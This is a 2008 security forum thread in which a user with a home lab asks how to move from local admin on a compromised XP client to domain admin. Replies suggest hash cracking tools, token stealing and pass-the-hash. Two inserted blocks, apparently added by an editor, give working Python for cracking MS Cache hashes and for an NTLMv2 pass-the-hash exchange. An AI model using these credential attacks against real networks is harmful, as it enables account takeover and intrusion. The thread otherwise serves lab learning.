Local Admin --> Domain Admin ??
l1nuxant_ee
06-25-2008, 09:06 AM
Hi there,
I have been trying to expand my knowledge, so I have set up a lab with the following configuration:
Fully Patched Windows 2003 Server (Acting as a domain controller)
Unpatched Client Machine (XP), which is joined to the above domain.
Since I have been able to compromise the client machine, I was able to get the local hashes, and have been able to crack them using rainbow tables. My question is: is there any possible way to get domain passwords?
I have read about the "CacheDump" tool, which will get the hashes for the last 10 logged-in users (something called MSCash), and have been able to get the hashes. However, it seems that these hashes cannot be cracked using rainbow tables, as they come in the following format:
username:hash(32 characters):domain:FQDN
So any idea on the above scenario ?
Thanks a lot in advance,
=Tron=
06-25-2008, 09:19 AM
have read about the "CacheDump" tool, which will get the hashes for the last 10 logged-in users (something called MSCash), and have been able to get the hashes. However, it seems that these hashes cannot be cracked using rainbow tables, as they come in the following format:
You do know that these passwords are much more secure than the LM hashes stored in the SAM file? For starters, each of the cached hashes has its own salt added, which will make them much more time-consuming to crack. I do not know about rainbow tables, but they can at least be cracked using John the Ripper; here is a good tutorial on this from Irongeek:
http://www.irongeek.com/i.php?page=security/cachecrack
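As an added example (not from the thread, the Irongeek tutorial, or any of the tools named in it): a pure-Python implementation of the MS Cache v1 hash that CacheDump prints on XP/2003, with a small dictionary attack over the username:hash:domain:FQDN line format quoted above. MD4 is written out rather than taken from hashlib because OpenSSL 3 builds often leave MD4 disabled. The block also goes beyond the thread's XP/2003 setup to show MS Cache v2 (Vista/Server 2008 and later), which wraps the same v1 value in PBKDF2-HMAC-SHA1. The username "jsmith", domain "LAB", the password and the wordlist are constructed sample data.

```python
"""MS Cache (DCC) hashes: compute them and run a wordlist against a cachedump line."""
import hashlib
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    x &= MASK
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, implemented here because hashlib's md4 is often unavailable."""
    msg = bytearray(data)
    bit_len = len(data) * 8
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)          # little-endian 64-bit length
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        m = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                    # round 1
            a = _rotl(a + f(b, c, d) + m[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                    # round 2
            a = _rotl(a + g(b, c, d) + m[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                    # round 3
            a = _rotl(a + h(b, c, d) + m[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash as stored in the SAM: MD4 over the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def dcc1(password: str, username: str) -> bytes:
    """MS Cache v1 (XP/2003, what cachedump dumps): MD4(NT hash || UTF-16LE(lower(user))).
    The lowercased username is the salt, so each user needs their own rainbow table."""
    return md4(nt_hash(password) + username.lower().encode("utf-16-le"))


def dcc2(password: str, username: str, rounds: int = 10240) -> bytes:
    """MS Cache v2 (Vista/2008+): PBKDF2-HMAC-SHA1 over the v1 value, same salt."""
    salt = username.lower().encode("utf-16-le")
    return hashlib.pbkdf2_hmac("sha1", dcc1(password, username), salt, rounds, dklen=16)


def parse_cachedump_line(line: str):
    """cachedump line as the OP describes it: username:hash:domain:FQDN"""
    user, hexhash, domain, fqdn = line.strip().split(":", 3)
    return user, bytes.fromhex(hexhash), domain, fqdn


def crack_dcc1(line: str, wordlist):
    """Dictionary attack on one v1 cachedump line; returns the password or None."""
    user, target, _domain, _fqdn = parse_cachedump_line(line)
    for candidate in wordlist:
        if dcc1(candidate, user) == target:
            return candidate
    return None


# Constructed sample (not from the thread): a cached entry for "jsmith" in LAB
# whose password is "Summer2008", formatted the way cachedump would print it.
SAMPLE_LINE = "jsmith:%s:LAB:lab.local" % dcc1("Summer2008", "jsmith").hex()
WORDLIST = ["password", "Password1", "Summer2008", "letmein"]

if __name__ == "__main__":
    print("cracked:", crack_dcc1(SAMPLE_LINE, WORDLIST))
    # Same password, two usernames: two different hashes, which is exactly why
    # a rainbow table built for one account says nothing about another.
    print("jsmith        :", dcc1("Summer2008", "jsmith").hex())
    print("administrator :", dcc1("Summer2008", "administrator").hex())
    print("v2 (slow)     :", dcc2("Summer2008", "jsmith").hex())
```

The salt is what breaks the rainbow-table approach: the table would have to be built per username, which is why John and Cain simply recompute the hash for every candidate against each dumped entry. Note that the v1 hash is still only two MD4 calls per guess, so a wordlist attack is cheap; v2 adds 10240 PBKDF2 iterations per guess on later Windows versions.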
williamc
06-25-2008, 10:16 AM
You can also use Cain to crack CacheDump passwords. However, I wouldn't give up on the LM hashes. Does your local admin password on the client work on the server? Do any of the user accounts give you access to the server? Try this:
http://forums.remote-exploit.org/showthread.php?t=12942
William
l1nuxant_ee
06-25-2008, 10:19 AM
You can also use Cain to crack CacheDump passwords. However, I wouldn't give up on the LM hashes. Does your local admin password on the client work on the server? Do any of the user accounts give you access to the server? Try this:
http://forums.remote-exploit.org/showthread.php?t=12942
William
Thanks for the reply. The local admin password doesn't give me access to the server, nor do any of the user passwords give me access to the server. I am thinking of some sort of privilege escalation (if possible); also I will give John the Ripper a try to crack the M$ cache hashes.
ipndrmath
07-11-2008, 09:58 AM
Thanks for the reply. The local admin password doesn't give me access to the server, nor do any of the user passwords give me access to the server. I am thinking of some sort of privilege escalation (if possible); also I will give John the Ripper a try to crack the M$ cache hashes.
John works well for any password cracking. Cain, albeit slower, also has great cracking abilities for cached passwords, and a rather attractive (in comparison) GUI, if you want to go that route.
Essentially, I'm just repeating what has already been said. Let us know if you have any problems.
__CG__
07-11-2008, 08:54 PM
Your best bet is going to be token stealing. Incognito has been built into Meterpreter, or you can upload the Pass-the-Hash Toolkit from Core.
Any domain users that have logged into the box since reboot should still have their tokens in memory. Once you are local admin or SYSTEM on the box, you can use one of the token-passing tools to take that token and become the domain user (hopefully some sort of admin, which wouldn't be too far-fetched if you are on any sort of server).
I did a couple blog posts on the different tools.
http://carnal0wnage.blogspot.com/search/label/token%20kidnaping
http://carnal0wnage.blogspot.com/search/label/pass%20the%20hash
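To make concrete what "pass the hash" buys you (added example; this is not the Core toolkit's code nor anything from the blog posts above): the NTLMv2 exchange in Python, where the client side is handed only the NT hash and never sees a password. The server challenge, client nonce, timestamp and blob layout are constructed and simplified; a real NTLMv2 blob carries a Windows FILETIME timestamp and AV pairs, both left out here. DUMPED_HASH is the well-known NT hash of "password", standing in for what the OP pulled from the workstation's SAM; DC_HASH_OTHER is an arbitrary constructed value standing in for a domain account with a different password.

```python
"""Pass-the-hash at the protocol level: NTLMv2 with only the NT hash on the client."""
import hashlib
import hmac
import os
import struct

# Constructed sample values (not from the thread).
DUMPED_HASH = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")   # NT hash of "password"
DC_HASH_OTHER = bytes.fromhex("00112233445566778899aabbccddeeff")  # some other password


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)).
    The NT hash is the HMAC key: whoever holds the hash can derive this
    without ever learning the password. The domain part is not uppercased."""
    msg = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, msg, hashlib.md5).digest()


def make_blob(timestamp: int, client_challenge: bytes) -> bytes:
    """Simplified NTLMv2 client blob: version, reserved, timestamp, client nonce, pad.
    Real blobs also carry AV pairs (target info); omitted here for brevity."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4)


def ntlmv2_response(nt_hash, user, domain, server_challenge, blob):
    """Client side: NTProofStr || blob, NTProofStr = HMAC-MD5(NTOWFv2, challenge || blob)."""
    key = ntowf_v2(nt_hash, user, domain)
    proof = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return proof + blob


def server_verify(stored_nt_hash, user, domain, server_challenge, response):
    """Server side: recompute the proof from its own stored NT hash and compare."""
    proof, blob = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def pass_the_hash(client_hash, server_hash, user="Administrator", domain="LAB"):
    """One full exchange; returns True when the server accepts the client's proof.
    The client never needs the plaintext, only the 16-byte NT hash."""
    server_challenge = os.urandom(8)
    blob = make_blob(timestamp=0, client_challenge=os.urandom(8))  # timestamp constructed
    response = ntlmv2_response(client_hash, user, domain, server_challenge, blob)
    return server_verify(server_hash, user, domain, server_challenge, response)


if __name__ == "__main__":
    # Local admin password reused on the server: the dumped hash alone gets you in.
    print("password reused on server:", pass_the_hash(DUMPED_HASH, DUMPED_HASH))
    # Different password on the server: the dumped hash is useless for that account.
    print("different server password:", pass_the_hash(DUMPED_HASH, DC_HASH_OTHER))
```

This is why cracking the LM/NT hash is optional for lateral movement: the hash is the credential. It also shows the limit williamc and shad0w_crash are getting at further down the thread: replaying the workstation's local admin hash against the 2003 server only works if that account's password is the same on both machines, which is exactly the reuse a token-stealing approach sidesteps.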
pureh@te
07-12-2008, 08:34 AM
Your best bet is going to be token stealing. Incognito has been built into Meterpreter, or you can upload the Pass-the-Hash Toolkit from Core.
Any domain users that have logged into the box since reboot should still have their tokens in memory. Once you are local admin or SYSTEM on the box, you can use one of the token-passing tools to take that token and become the domain user (hopefully some sort of admin, which wouldn't be too far-fetched if you are on any sort of server).
I did a couple blog posts on the different tools.
http://carnal0wnage.blogspot.com/search/label/token%20kidnaping
http://carnal0wnage.blogspot.com/search/label/pass%20the%20hash
Nice post on Incognito. I'm assuming you're one of the guys from LSO, so I just wanted to welcome you to the forums if I had not done so already :)
l1nuxant_ee
07-12-2008, 08:41 AM
Your best bet is going to be token stealing. Incognito has been built into Meterpreter, or you can upload the Pass-the-Hash Toolkit from Core.
Any domain users that have logged into the box since reboot should still have their tokens in memory. Once you are local admin or SYSTEM on the box, you can use one of the token-passing tools to take that token and become the domain user (hopefully some sort of admin, which wouldn't be too far-fetched if you are on any sort of server).
I did a couple blog posts on the different tools.
http://carnal0wnage.blogspot.com/search/label/token%20kidnaping
http://carnal0wnage.blogspot.com/search/label/pass%20the%20hash
Great topics, I will give them a try :)
Thanks a lot,
__CG__
07-12-2008, 10:01 AM
Thanks pureh@te! Been lurking here and the IRC chan.
good to be here.
shad0w_crash
09-22-2008, 06:26 AM
I once pentested a network where a local administrator password was the same as the domain administrator password.
If the client connects to the fully patched server, you can look for shares and try to brute-force them so you could get some network accounts.
If you have the time a sniffer could do the job.
kraven666
09-25-2008, 03:08 AM
Thanks for the links __CG__ , very interesting read. Thanks!
Kraven666
pipboy
10-02-2008, 09:06 PM
Well, I suppose this is not entirely relevant, but I learned a neat trick in college when a friend was working on his Server 2003 project and forgot the domain controller password. We of course had physical access to the machine, which is not an entirely realistic situation, but hey, the guy wanted access to his project and I thought it was kinda cool.
The method was pretty basic: start the machine in Directory Services Restore Mode, which disables Active Directory. Once Active Directory is disabled, log onto the machine locally, which is doable if you're crafty enough; once you are in the local machine you essentially create a service that will reset your domain password by running a registry key. The whole process is kinda nifty and useful if you're messing around with Server and forget your password, but it also stresses the importance of physical protection of your machine, which I see neglected far too often. xxx.petri.co.il/reset_domain_admin_password_in_windows_server_2003 _ad.htm
bofh28
10-05-2008, 05:08 PM
www.petri.co.il/reset_domain_admin_password_in_windows_server_2003 _ad.htm gives a 404 error.